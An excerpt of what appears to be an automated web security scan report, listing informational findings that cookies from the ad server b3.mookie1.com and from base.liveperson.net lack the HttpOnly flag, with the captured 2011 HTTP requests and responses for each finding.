Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935? HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=;ord=334085935?
Content-Length: 568
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313? HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?
Content-Length: 653
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:44:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=b3&migTrackDataExt=n4;USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300;FarmD_2011Q1_TRIBALF_A_TX_300;:$:TribalFusionB3/FarmersDirect/2011Q1/A_TX/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 568
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=188&a
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:44:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_TF_CT_728;RS_SELL_2011Q1_TF_CT_728;:$:TribalFusionB3/RadioShack/SELL_2011Q1/CT/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 557
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:44:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_TF_CT_728;RS_SELL_2011Q1_TF_CT_728;:$:TribalFusionB3/RadioShack/SELL_2011Q1/CT/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 557
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.270. http://b3.mookie1.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:49:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:41:54 GMT
ETag: "1fe03-1cee-bbc5480"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

11.271. http://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-16101423669632-1296223154:0; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
HumanClickKEY=6680227135865200365; path=/hc/5296924
HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.272. http://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=6680227135865200365; path=/hc/5296924
HumanClickACTIVE=1296223153625; expires=Sat, 29-Jan-2011 13:59:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?&site=5296924&cmd=mTagKnockPage&lpCallId=468449104344-358576817670&protV=20&lpjson=1&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-seo-campaign1%7ClpMTagConfig.db1%7ClpButton-seo-campaign1%7C%23chat-seo-campaign2%7ClpMTagConfig.db1%7ClpButton-seo-campaign2%7C%23voice-seo-campaign%7Cnull%7ClpButton-voice-seo-campaign%7C HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924
Set-Cookie: HumanClickACTIVE=1296223153625; expires=Sat, 29-Jan-2011 13:59:13 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 13:59:13 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31783

lpConnLib.Process({"ResultSet": {"lpCallId":"468449104344-358576817670","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'base.liveperson.ne
...[SNIP]...

11.273. http://base.liveperson.net/hc/5296924/cmd/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://base.liveperson.net
Path:	/hc/5296924/cmd/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:06:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Location: http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

11.274. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
HumanClickKEY=1417917221691646769; path=/hc/5296924
